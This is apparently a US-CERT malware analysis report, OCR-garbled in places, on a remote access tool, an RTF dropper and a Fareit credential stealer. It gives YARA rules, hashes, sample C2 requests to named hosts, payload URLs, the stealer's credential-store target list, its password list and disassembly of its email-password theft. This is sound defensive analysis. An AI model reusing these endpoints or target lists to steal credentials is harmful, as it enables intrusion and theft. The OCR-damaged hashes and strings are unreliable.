PE Sections 


Compiled 

2014-12-18T19:08:53Z 



Name 

MD5 

Raw Size 

Entropy 

(header) 

38153f895d4b391 ee08f3a0814df439a 

1024 

2.48999986641 

text 

41ed1207da910058e1882426b9627644 

337920 

6.45016237717 

rdata 

27694317558299dd 1609b4f476d7141 f 

68608 

4.70267295411 

data 

b65dd078b5a24ec0a223fdf6b3ed 134a 

8192 

5.29144751488 

reloc 

bc8ec2f7707d0a33f9663235cf b2a4ea 

18944 

6.5984520808 

Packers 




Name 

Version Entry Point 




Borland Delphi 3.0 (???) NA NA 

Relationships 

(F) 

9acba7e5f972cdd722541a23ff314ea81ac35d5c0 Connected_To (D) cderlearn com 

C758eb708fb6e2cc4f598a0 (ae7e3) 

(F) 

9acba7e5f972cdd722541a23ff314ea81ac35d5c0 Characterized_By (S) digital_cert_steal.bmp 

C758eb7081b6e2cc4f598a0 (ae7e3) 

Description 

This file is a Windows DLL application. It has been identified as a fully functioning remote access tool providing a vast array of command and 
control capabilities. This program uses a secure strings method to unpack strings used during runtime by multiple portions of the application. 
Displayed below is a YARA signature which may be used to detect this application. This YARA signature is based primarily on the identified 
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secure strings method. 


-—Begin YARA Signature— 

rule unidentified_malware 

{ 

meta: 

Author = "US-CERT Code Analysis Team" 

Date = 16JAN17 
Incident = 10105049 

File = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0" 

MD5 = "AE7E3E531494B201FBF6021066DDD188" 

strings: 

$my_string_one = { 8D 78 03 8A 65 FF 8D A4 24 00 00 00 00 8A 04 OF 32 C4 88 04 11 41 3B CE 72 F3 } 

$my_stringJ w o = "CryptAcquireCertificatePrivateKey" 

$my_string_three = "CertFreeCertificateContext" 

$my_string_four = "CertEnumCertificatesInStore" 

$my_string_five = "PFXImportCertStore" 

condition: 
all of them 
} 

—End YARA Signature— 

During runtime, the malware attempts to communicate with its C2 server, cderlearn[.]com. Displayed below are sample connections between 
the malware and its C2 server. 

—Begin Sample C2 Connections— 

POST/search.cfm HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

Host: www[.]cderlearn.com 
Content-Length: 38 
Connection: Keep-Alive 
Cache-Control: no-cache 
Pragma: no-cache 

rss=a5ce5fa&pg=f8&sa=8816db73d479e8e35 

POST/search.cfm HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

Host: www[.]cderlearn.com 
Content-Length: 46 
Cache-Control: no-cache 

id=3&source=a804b4b73d479eebea&rss=53d0&ei=d3c 
—End Sample C2 Connections— 

The application attempts to download data from a C2 server and write it to a randomly named .tmp file within the users %TEMP% directory. 
Some of the file names used to store this downloaded data within our lab environment are displayed below: 

—Begin Sample File Names— 

TEMP\Cab5.tmp 

TEMP\Tar6.tmp 

TEMP\Cab7.tmp 

TEMP\Tar8.tmp 

-—End Sample File Names— 

Analysis indicates this application provides several notable capabilities to an operator. The program provides an operator access to a 
reverse shell on the victim system. Additionally, the malware provides an operator the capability to enumerate the victims Windows 
Certificate Store, and extract identified digital certificates, including private keys. The application also allows an operator to enumerate all 
physical drives and network resources the victim system has access to. 
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Screenshots 


• digital_cert_steal.bmp 



Screen shot of code used by 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 to steal a victim users 
digital certificates from the Windows Certificate Store. 


ac30321 be90e85f7eb1 ce7e211 b91 fedl dl f 15b5d3235b9c1 e0dad683538cc8e 


Details 

Name ac30321 be90e85f7eb 1 ce7e211 b91 fed 1 d 1 f 15b5d3235b9c1 e0dad683538cc8e 
Size 714679 


Type 

MD5 

SHA1 


Rich Text Format data, version 1, unknown character set 

81 fl af277010cb78755f08dfcc379ca6 

9cb7716d83c0d06ab356bdfa52def1 af64bc5210 


ssdeep 3072:0gOxPV0p1knm8Z0gPJQ3kq9d6AvgBodb30aCubtvn7JBsEitau3QCv:jOBVs1knm8ZPJQ3kqoodkuZjlbVY 
Entropy 3.29548128269 


Antivirus 


F-prot 

W32/Dridex.HX 

McAfee 

Fareit-FHF 

NetGate 

Trojan. Win32. Malware 

F-secure 

Gen:Variant.Razy.41230 

Symantec 

Trojan. Fareit 

VirusBIokAda 

TrojanPSW.Fareit 

ClamAV 

Win.Trojan.Agent-5486255-0 

Kaspersky 

Trojan-PSW. Win32. Fareit.bshk 

TrendMicro 

TROJ_FA.6BBF19ED 

Sophos 

Troj/Fareit-AMQ 

Avira 

TR/AD. Fareit. Y.ehkw 

Microsoft 

PWS:Win32/Fareit 

Ahnlab 

RTF/Dropper 

NANOAV 

Trojan.Rtf. Stealer.efqzyl 

TrendMicroHouseCall 

TROJ_FA.6BBF19ED 

Ikarus 

Trojan.Win32.Zlader 


Relationships 

(F) (F) 

ac30321 be90e85f7eb1 ce7e211 b91fed1 dlfl 5b5d Dropped 9f918fb741 e951 al 0e68ce6874b839aef5a26d604 
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3235b9c1e0dad683538cc8e (81f1a) 86db31e509f8dcaa13acec5 (617ba) 

(F) (S) 

ac30321 be90e85f7eb1 ce7e211 b91 fed 1 dl fl 5b5d Characterized_By ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d 

3235b9c1 e0dad683538cc8e(81 fl a) 3235b9c1e0dad683538cc8e 

Description 

This is a malicious RTF document containing an embedded encoded executable. Upon execution, the RTF will decode and install the 
executable to %Temp%\m3.tmp (9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5). The encoded executable is 
decoded using a hexadecimal algorithm. The document will attempt to execute m3.tmp but fails to execute due to the file exetension. 

Screenshots 

• ac30321 be90e85f7eb1 ce7e211 b91 fedl dl fl 5b5d3235b9c1 e0dad683538cc8e 



9f918fb741 e951a10e68ce6874b839aef5a26d60486db31 e509f8dcaa13acec5 


Details 

Name 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 
Size 117248 


Type 

MD5 

SHA1 

ssdeep 

Entropy 


PE32 executable (GUI) Intel 80386, for MS Windows 
617ba99be8a7d0771628344d209e9d8a 
7cefb021fb30f985b427b584be9c16e364836739 

3072:CN7FVxVzbL02rXlwilrCIX1O6OhOqsY9WZYWmwdaX82X45iAKMaEUSDslGz0x:CNxVjbLXDup2IXY6O0VYIOMW 

6.86854130027 


Antivirus 


F-prot 

W32/Dridex.HX 

McAfee 

Fareit-FHF 

K7 

Trojan (004df8ee1 ) 

Sy st weak 

trojan.passwordstealer 

F-secure 

Gen:Variant.Razy.41230 

VirIT 

Trojan.Win32.Crypt5.AYWX 

Symantec 

Trojan.Fareit 

VirusBIokAda 

TrojanPSW.Fareit 

Zillya! 

Trojan.Fareit. Win32.14782 

ClamAV 

Win.Trojan.Agent-5486256-0 

Kaspersky 

Trojan-PSW. Win32. Fareit.bshk 

TrendMicro 

TSPY_FA.CFEECD19 

Sophos 

Troj/Fareit-AMQ 

Avira 

TR/AD. Fareit. Y.ehkw 

Microsoft 

PWS:Win32/Fareit 

Ahnlab 

Trojan/Win32. Fareit 
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ESET 

NANOAV 

TrendMicroHouseCall 

Ikarus 

AVG 


a variant of Win32/Kryptik.EPKG trojan 
Trojan.Win32.AD.ebscsw 
TSPY_FA CFEECD19 
Trojan.Win32.Zlader 
Crypt5.AYWX 


PE Information 

Compiled 2016-04-18T11:56:11Z 


PE Sections 


Name 

MD5 

Raw Size 

Entropy 

(header) 

el c85b83a230f3318ebc6fa89c22e4ca 

1024 

2.65800537214 

.text 

03d3283ed2aeae19148e30ce10bf86a6 

32256 

6.56847358123 

.rdata 

2b14260b6390c8b1470b6c7b33aead11 

52224 

7.2456007683 

.data 

c78d3b76f24406d 13bd8f743617d 103d 

8704 

7.47497492698 

relocat 

50e4a218247898300dfa8489c256fc42 

1024 

4.0454558827 

.engine 

105b697001f91df315bba402a79fde8b 

512 

2.16767435848 

rsrc 

5f0793cbe2573fe809f569f742ed b4 53 

21504 

3.88806352708 

Packers 




Name 

Version Entry Point 



Microsoft Visual C++?.? NA NA 




Relationships 

(F) 

9f918f b741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(F) 

9f918fb741e951 al 0e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

Description 

Durning analysis this file is dropped by ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e. This file is a heavily 
packed/protected Windows 32 bit executable. Static analysis indicates this application is a fully functioning Remote Access Tools. During 
runtime, it attempts to communicate to the c2 locations displayed below. 

wilcarobbe.com/zapoy/gate.php 

littjohnwilhap.ru/zapoy/gate.php 

ritsoperrol.ru/zapoy/gate.php 

one2shoppee.com/system/logs/xtool.exe 

insta.reduct.ru/system/logs/xtool.exe 

editprod waterfilter.in ua/system/logs/xtool exe 

mymodule.waterfilter in.ua/system/logs/xtool exe 


CharacterizedBy (S) searching_reg_pop3.bmp 


ConnectedTo (D) editprod.waterfilter.in.ua 


ConnectedTo (D) insta.reduct.ru 


ConnectedTo (D) one2shoppee.com 


Connected To (D) ritsoperrol.ru 


Connected To (D) littjohnwilhap.ru 


ConnectedTo (D) wilcarobbe.com 


Connected To 


DroppedBy 


(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

(F) 

ac30321 be90e85f7eb 1 ce7e211 b91 fed 1 d 1 f 15b5d 
3235b9c1e0dad683538cc8e (81f1a) 
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The file xtool.exe was not available for download at the time of analysis. 

This executable file drops and executes a batch file '%Temp%\[random digits],bat' to delete itself and the batch file at the end of the 
execution. 

Displayed below are sample connections between the malware and its C2 server. 

—Begin Sample Connections to C2 Server— 

POST /zapoy/gate.php HTTP/1.0 
Host: wilcarobbe.com 
Accept: */* 

Accept-Encoding: identity, *;q=0 
Accept-Language: en-US 
Content-Length: 196 
Content-Type: application/octet-stream 
Connection: close 
Content-Encoding: binary 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 

3.5.21022) 

...[xXP.YG.4...d...S.q0....4.v..8 ..Y.u. 

X..3S*3.S..%<A.5..U..."N.W...eY...o. A ...V.. A .v.#...+.]'..Y.L.5.b[>?.".).>... 

>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5... 


POST /zapoy/gate.php HTTP/1.0 
Host: littjohnwilhap.ru 
Accept: */* 

Accept-Encoding: identity, *;q=0 
Accept-Language: en-US 
Content-Length: 196 
Content-Type: application/octet-stream 
Connection: close 
Content-Encoding: binary 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 

3.5.21022) 

...[xXP.YG.4...d...S.q0....4.v..8 ..Y.u. 

X..3S*3.S..%<A.5..U..."N.W...eY...o. A ...V.. A .v.#...+.]\.Y.L.5.b[>?.".).>... 

>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5... 

POST /zapoy/gate.php HTTP/1.0 
Host: ritsoperrol.ru 
Accept: */* 

Accept-Encoding: identity, *;q=0 
Accept-Language: en-US 
Content-Length: 196 
Content-Type: application/octet-stream 
Connection: close 
Content-Encoding: binary 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 

3.5.21022) 

...[xXP.YG.4...d...S.q0....4.v..8 ..Y.u. 

X..3S*3.S..%<A.5..U..."N.W...eY...o. A ...V.. A .v.#...+.]\.Y.L.5.b[>?.".).>... 

>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5... 

—End Sample Connections to C2 Server— 

Static analysis of the unpacked portions of this file indicate it is, among other things, capable of targeting multiple Windows applications. For 
example, the malware searches the Windows registry for keys utilized by multiple types of Windows email software. If found, the malware 
attempts to extract email passwords from these keys. This appears to be an attempt to gain unauthorized access to the victim users emails. 

In addition, the software attempts to find registry keys used by the Windows file management software named Total Commander. This 
appears to be an attempt to gain unauthorized access to the victim users stored files. The software also contains a list of commonly used 
passwords. This indicates the malware provides an operator the capability to brute force their way into a victim users email accounts or 
locations where their files are stored. Displayed below is a YARA signature which may be utilized to detect this software both packed on disk, 
and running within system memory. 

—Begin YARA Signature— 
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rule unidentified_malware_two 

{ 

meta: 

Author = "US-CERT Code Analysis Team" 

Date = 16JAN17 
Incident = 10105049 

File = "9f918fb741 e951a10e68ce6874b839aef5a26d60486db31 e509f8dcaa13acec5" 

MD5 = "617BA99BE8A7D0771628344D209E9D8A" 

strings: 

$my_string_ on e = "/zapoy/gate.php" 

$my_string_two = { E3 40 FE 45 FD OF B6 45 FD OF B6 14 38 88 55 FF 00 55 FC OF B6 45 FC 8A 14 38 88 55 FE OF B6 45 FD 88 14 38 
OF B6 45 FC 8A 55 FF 88 14 38 8A 55 FF 02 55 FE 8A 14 3A 8B 45 F8 30 14 30 } 

$my_string_three = "S:\\Lidstone\\renewing\\FIA\\disable\\ln.pdb" 

$my_string_four = { 8B CF OF AF CE 8B C6 99 2B C2 8B 55 08 D1 F8 03 C8 8B 45 FC 03 C2 89 45 10 8A 00 2B CB 32 Cl 85 DB 74 07 } 
$my_string_five = "fuckyoul" 

$my_ s tring_ s i x = "xtool.exe" 
condition: 

($my_string_one and $my_string_two) or ($my_string_three or $my_string_four) or ($my_string_five and $my_string_six) 

} 

—End YARA Signature- 

Displayed below are strings of interest extracted from the unpacked portions of this malware: 

—Begin Strings of Interest— 

1DA409EB2825851644CCDAB 

1RcpNUE12zpJ8uDaDqlygR70aZI2ogwes 

wilcarobbe.com/zapoy/gate.php 

littjohnwilhap.ru/zapoy/gate.php 

ritsoperrol.ru/zapoy/gate.php 

one2shoppee.com/system/logs/xtool.exe 

insta.reduct.ru/system/logs/xtool.exe 

editprod.waterfilter.in.ua/system/logs/xtool.exe 

YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 

MODU 

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall 

UninstallString 

DisplayName 

.exe 

SoftwareWVinRAR 

open 

vaultcli.dll 

VaultOpenVault 

VaultEnumerateltems 

VauItGetltem 

VaultCloseVault 

VaultFree 

kernel32.dll 

WTSGetActiveConsoleSessionld 

ProcessIdToSessionld 

netapi32.dll 

NetApiBufferFree 

NetUserEnum 

ole32.dll 

StgOpenStorage 
advapi32.dll 
AllocateAndlnitializeSid 
CheckTokenMembership 
FreeS id 

CredEnumerateA 

CredFree 

CryptGetUserKey 

CryptExportKey 

CryptDestroyKey 

CryptReleaseContext 

RevertToSelf 
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OpenProcessToken 

ImpersonateLoggedOnUser 

GetToken I nformation 

ConvertSidToStringSidA 

LogonUserA 

LookupPrivilegeValueA 

AdjustTokenPrivileges 

CreateProcessAsUserA 

crypt32.dll 

CryptUnprotectData 

CertOpenSystemStoreA 

CertEnumCertificatesInStore 

CertCloseStore 

CryptAcquireCertificatePrivateKey 

msi.dll 

MsiGetComponentPathA 

pstorec.dll 

PStoreCreatelnstance 

userenv.dll 

CreateEnvironmentBlock 

DestroyEnvironmentBlock 

[9D 

wY} 

wSw 

wv{ 

vshell32.dll 

SHGetFolderPathA 

My Documents 

AppData 

Local AppData 

Cache 

Cookies 

History 

My Documents 
Common AppData 
My Pictures 
Common Documents 
Common Administrative Tools 
Administrative Tools 
Personal 

Software\Microsoft\Windows\CurrentVersion\Expiorer\Shell Folders 

explorer.exe 

S-1-5-18 

SelmpersonatePrivilege 

SeTcbPrivilege 

SeChangeNotifyPrivilege 

SeCreateTokenPrivilege 

SeBackupPrivilege 

SeRestorePrivilege 

SelncreaseQuotaPrivilege 

SeAssignPrimaryTokenPrivilege 

GetNativeSystemlnfo 

kernel32.dll 

lsWow64Process 

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0) 
POST %s HTTP/1.0 
Host: %s 
Accept: */* 

Accept-Encoding: identity, *;q=0 
Accept-Language: en-US 
Content-Length: %lu 
Content-Type: application/octet-stream 
Connection: close 
Content-Encoding: binary 
User-Agent: %s 
Content-Length: 

Location: 

\ * * 

* * 

Software\Microsoft\Windows\CurrentVersion\lnternet Settings 

ProxyServer 

HWID 
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{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 

Software\Far\Plugins\FTP\Hosts 

Software\Far2\Plugins\FTP\Flosts 

Software\Far Manager\Plugins\FTP\Flosts 

Software\Far\SavedDialoghlistory\FTPFIost 

Software\Far2\SavedDialoghlistory\FTPFIost 

Software\Far Manager\SavedDialogFlistory\FTPFIost 

Password 

FlostName 

User 

Line 

wcx_ftp.ini 

\GHISLER 

InstallDir 

FtpIniName 

Software\Ghisler\Windows Commander 
Software\Ghisler\Total Commander 
CUTEFTP 
QCFlistory 

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar 
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar 
Software\GlobalSCAPE\CuteFTP 7 Flome\QCToolbar 
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar 
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar 
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar 
Software\GlobalSCAPE\CuteFTP 9\QCToolbar 
\GlobalSCAPE\CuteFTP 
\GlobalSCAPE\CuteFTP Pro 
\GlobalSCAPE\CuteFTP Lite 
\CuteFTP 
\sm.dat 

Software\FlashFXP\3 

Software\FlashFXP 

Software\FlashFXP\4 

InstallerDathPath 

path 

Install Path 

DataFolder 

\Sites.dat 

\Quick.dat 

\History.dat 

\FlashFXP\3 

\FlashFXP\4 

\FileZilla 

\sitemanager.xml 

\recentservers.xml 

\filezilla.xml 

Software\FileZilla 

Software\FileZilla Client 

lnstall_Dir 

Flost 

User 

Pass 

Port 

Remote Dir 
Server Type 
Server. Flost 
Server. User 
Server. Pass 
Server. Port 
Path 

ServerType 
Last Server Flost 
Last Server User 
Last Server Pass 
Last Server Port 
Last Server Path 
Last Server Type 

Software\FTPWare\COREFTP\Sites 

Flost 

User 

Port 
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PthR 

SSH 

.ini 

Wan Dy ke\Config\Sessions 
\Sessions 

SoftwareWanDyke\SecureFX 

Config Path 

Password 

HostName 

UserName 

RemoteDirectory 

PortNumber 

FS Protocol 

Software\Martin Prikryl 

http[:]// 

https[:]// 

ftp:// 

opera 

wand.dat 

_Software\Opera Software 
Last Directory3 
Last Install Path 

Opera. FITML\shell\open\command 

\Opera Software 

nss3.dll 

NSSJnit 

NSS_Shutdown 

NSSBase64_DecodeBuffer 

SECITEM_Freeltem 

PK11_GetlnternalKeySlot 

PK11_Authenticate 

PK11 SDR_Decrypt 

PK11_FreeSlot 

profiles.ini 

Profile 

IsRelative 

Path 

PathToExe 

prefs.js 

logins.json 

signons.sqlite 

signons.txt 

signons2.txt 

signons3.txt 

encryptedPassword":" 

encryptedUsername":" 

hostname":" 

#2c 
#2d 
#2e 
Fi refox 

\Mozilla\Firefox\ 

Software\Mozilla 

ftp:// 

http[:]// 

https[:]// 

ftp. 

Mozilla 

\Mozilla\Profiles\ 

Favorites.dat 

WinFTP 

Internet Explorer 
WininetCacheCredentials 
MS IE FTP Passwords 
DPAPI: 

@J7< 

AJ7< 

BJ7< 

%02X 

Software\Microsoft\lnternet Explorer\lntelliForms\Storage2 

SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage 
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\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\lntelliForms\FormData 
http[:]//www[. Jfacebook.com/ 

Microsoft_Winlnet_* 

ftp:// 

SspiPfc 

JpM 

;USQLite format 3 
table 
0 

CONSTRAINT 

PRIMARY 

UNIQUE 

CHECK 

FOREIGN 

Web Data 

Login Data 

logins 

origin_url 

password_value 

username_value 

ftp:// 

http[:]// 

https[:]// 

mozjogins 

hostname 

encrypted Password 

encryptedUsername 

\Google\Chrome 

\Chromium 

\ChromePlus 

Software\ChromePlus 

lnstall_Dir 

.rdp 

TERMSRV/* 
password 51 :b: 
username:s: 
full address:s: 

TERMSRV/ 

hM@ 

$o@ 

= A @ 

$a@ 

#y@ 

1z@ 

.oeaccount 

Salt 

<_OP3_Password2 

<_MTP_Password2 

<IMAP_Password2 

<HTTPMail_Password2 

\Microsoft\Windows Live Mail 

Software\Microsoft\Windows Live Mail 

\Microsoft\Windows Mail 

Software\Microsoft\Windows Mail 

SoftwareMncrediMail 

EmailAddress 

Technology 

PopServer 

PopPort 

PopAccount 

PopPassword 

SmtpServer 

SmtpPort 

SmtpAccount 

SmtpPassword 

SMTP Email Address 

SMTP Server 

POP3 Server 

POP3 User Name 

SMTP User Name 

NNTP Email Address 

NNTP User Name 
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NNTP Server 
IMAP Server 
IMAP User Name 
Email 

HTTP User 
HTTP Server URL 
POP3 User 
IMAP User 

HTTPMail User Name 
HTTPMail Server 
SMTP User 
POP3 Port 
SMTP Port 
IMAP Port 
POP3 Password2 
IMAP Password2 
NNTP Password2 
HTTPMail Password2 
SMTP Password2 
POP3 Password 
IMAP Password 
NNTP Password 
HTTP Password 
SMTP Password 

Software\Microsoft\lnternet Account Manager\Accounts 
Identities 

Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings 

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 

Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook 

Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook 

Software\Microsoft\lnternet Account Manager 

Outlook 

\Accounts 

identification 

identitymgr 

inetcomm server passwords 
outlook account manager passwords 
identities 

{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 

Thunderbird 

VThunderbird 

samantha 

michelle 

david 

eminem 

scooter 

asdfasdf 

sammy 

baby 

diamond 

maxwell 

55555 

justin 

james 

chicken 

danielle 

iloveyou2 

fuckoff 

prince 

junior 

rainbow 

112233 

fuckyoul 

nintendo 

peanut 

none 

church 

bubbles 

robert 

222222 

destiny 
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loving 
gfhjkm 
mylove 
jasper 
hallo 
123321 
cocacola 
helpme 
nicole 
guitar 
billgates 
looking 
scooby 
joseph 
genesis 
forum 
emmanuel 
cassie 
victory 
password 
foobar 
ilovegod 
nathan 
blabla 
digital 
peaches 
football 1 
11111111 
power 
thunder 
gateway 
iloveyou! 
football 
tigger 
corvette 
angel 
killer 
creative 
123456789 
google 
zxcvbnm 
startrek 
ashley 
cheese 
sunshine 
Christ 
000000 
soccer 
qwerty 1 
friend 
summer 
1234567 
merlin 
phpbb 
12345678 
jordan 
saved 
dexter 
viper 
winner 
sparky 
windows 
123abc 
lucky 
anthony 
jesus 
ghbdtn 
admin 
hotdog 
baseball 
password 1 
dragon 
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trustnol 
jason 
internet 
mustdie 
john 
letmein 
123 
mike 
knight 
jordan23 
abc123 
red 123 
praise 
freedom 
jesusl 
12345 
london 
computer 
microsoft 
muffin 
qwert 
mother 
master 
111111 
qazwsx 
samuel 
Canada 
slayer 
rachel 
onelove 
qwerty 
prayer 
iloveyoul 
whatever 
god 

password 
blessing 
snoopy 
1q2w3e4r 
cookie 
11111 
chelsea 
pokemon 
hahaha 
aaaaaa 
hardcore 
shadow 
welcome 
mustang 
654321 
bailey 
blahblah 
matrix 
jessica 
stella 
benjamin 
testing 
secret 
trinity 
richard 
peace 
shalom 
monkey 
iloveyou 
thomas 
blinkl 82 
jasmine 
purple 
test 
angels 
grace 
hello 
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poop 

blessed 

1234567890 

heaven 

hunter 

pepper 

john316 

cool 

buster 

andrew 

faith 

ginger 

7777777 

hockey 

hellol 

angell 

superman 

enter 

daniel 

123123 

forever 

nothing 

dakota 

kitten 

asdf 

1111 

banana 

gates 

flower 

taylor 

lovely 

hannah 

princess 

Compaq 

jennifer 

myspacel 

smokey 

matthew 

harley 

rotimi 

fuckyou 

soccerl 

123456 

single 

joshua 

green 

123qwe 

starwars 

love 

silver 

austin 

michael 

amanda 

1234 

Charlie 

bandit 

chris 

happy 

hope 

maggie 

maverick 

online 

spirit 

george 

friends 

dallas 

adidas 

1q2w3e 

7777 

orange 

testtest 

asshole 
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apple 

biteme 

666666 

william 

mickey 

asdfgh 

wisdom 

batman 

pass 

—End Strings of Interest— 

Analysis indicates the primary purpose of this application is to allow an operator to gain unauthorized access to the victim's user data and 
email by hijacking the applications. 

Screenshots 

• searching_reg_pop3.bmp 


push [eDp*doinflPxj ; dulndex 

push [ebp+phkResult] ; hKey 

call ReqEnunKeyExft 

and eax, pax 

jz_short Ioc«i0fl330 


loc *408330: 

M\\M 

push 

offset asc 4191CC 


push 

[ebp«lpString2] ; 

lpString2 

call 

sub h01F3b 


nou 

edx, eax ; 

Malware Searchi 
For Stored Enai 

lea 

eax, [ebp«Nane] 


push 

eax ; 

int 

push 

edx ; 

hllen 

call 

sub 4U1E88 


now 

[ebp«hMen], eax 


push 

o ; 

int 

push 

offset aEnailaddrcss . in.iiiftddt 

push 

[ebp+hMen] ; 

IpSubKey 

push 

[ebp*hKeyj ; 

hKey 

call 

10 REGQUERYUALUt 


now 

[ebp«lpString], eax 

push 

9 ; 

int 

push 

offset aTechnology ; technology 

push 

[ebp*hMen] ; 

IpSubKey 

push 

[ebp+hKeyj ; 

hKey 

call 

TO RFGQUFRYURl UF 


now 

[ebp+war 818], eax 

push 

9 ; 

int 

push 

offset aPopserwer 

; "PopSerwer" 

push 

[ebp«hl<en) ; 

IpSubKey 

push 

[ebp+hKey) ; 

hKey 

call 

10 REGQUERVURLUL 


now 

[ebp*uar 81C], eax 

lea 

eax, [ebp«war 82b] 

push 

eax ; 

int 

push 

offset aPopport ; 

•'PopPort” 

push 

[ebp«hHen] ; 

IpSubKey 

push 

[ebp+hKey] ; 

hKey 

call 

10 RE6QUERVURLUE 



now [ebp*uar_829] , eax 

push o ; int 

push offset aPopaccount ; "Popflccount” 

push [ebp«hHen] ; IpSubKey 

push [ebp«hKey] ; hKey 

call 10_REGQUERVUALUE 

nou [ebp«war 828], eax 

lea pax, (ebp«war 839] 

push eax ; int 

push offset aPoppassuord : "Popp r •.worn'' 

push [ebp«hMen] ; IpSubKey 

push [ebp*hKey] ; hKey 

call IO_REGQUERVUftLUE 


mm 


jrcp 


loc iiMSOfl 


Code utilized by 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 to parse email passwords from the 
user's Windows registry hive. 


Domains 

private.directinvesting.com 
HTTP Sessions 

• GET /lexicon/index.Cfm?dq=d9487&pg=149a8d6adb73d479e66c6 HTTP/1.1 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

Host: private.directinvesting.com 
Connection: Keep-Alive 
Cache-Control: no-cache 
Pragma: no-cache 

• GET /lexicon/index.cfm?source=0887a&css=b9&utm term=80aaeb73d479e66c6&f=12 HTTP/1.1 
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User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

Host: private.directinvesting.com 
Connection: Keep-Alive 
Cache-Control: no-cache 
Pragma: no-cache 

• GET /lexicon/index.cfm?utm_content=876b73d479e66c6&source=19bd05efa8c HTTP/1.1 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

Host: private.directinvesting.com 
Connection: Keep-Alive 
Cache-Control: no-cache 
Pragma: no-cache 

Whois 

Address lookup 

canonical name private.directinvesting.com. 
aliases 

addresses 204.12.12.40 
Domain Whois record 

Queried whois.internic.net with "dom directinvesting.com"... 

Domain Name: DIRECTINVESTING.COM 
Registrar: NETWORK SOLUTIONS, LLC. 

Sponsoring Registrar IANA ID: 2 
Whois Server: whois.networksolutions.com 
Referral URL: http[:]//networksolutions.com 
Name Server: NS1.LNHI.NET 
Name Server: NS2.LNHI.NET 
Name Server: NS3.LNHI.NET 

Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited 
Updated Date: 04-jun-2016 
Creation Date: 04-aug-1997 
Expiration Date: 03-aug-2021 

»> Last update of whois database: Mon, 16 Jan 2017 12:55:58 GMT «< 

Queried whois.networksolutions.com with "directinvesting.com"... 

Domain Name: DIRECTINVESTING.COM 

Registry Domain ID: 5318825_DOMAIN_COM-VRSN 

Registrar WHOIS Server: whois.networksolutions.com 

Registrar URL: http[:]//networksolutions.com 

Updated Date: 2016-06-04T07:10:34Z 

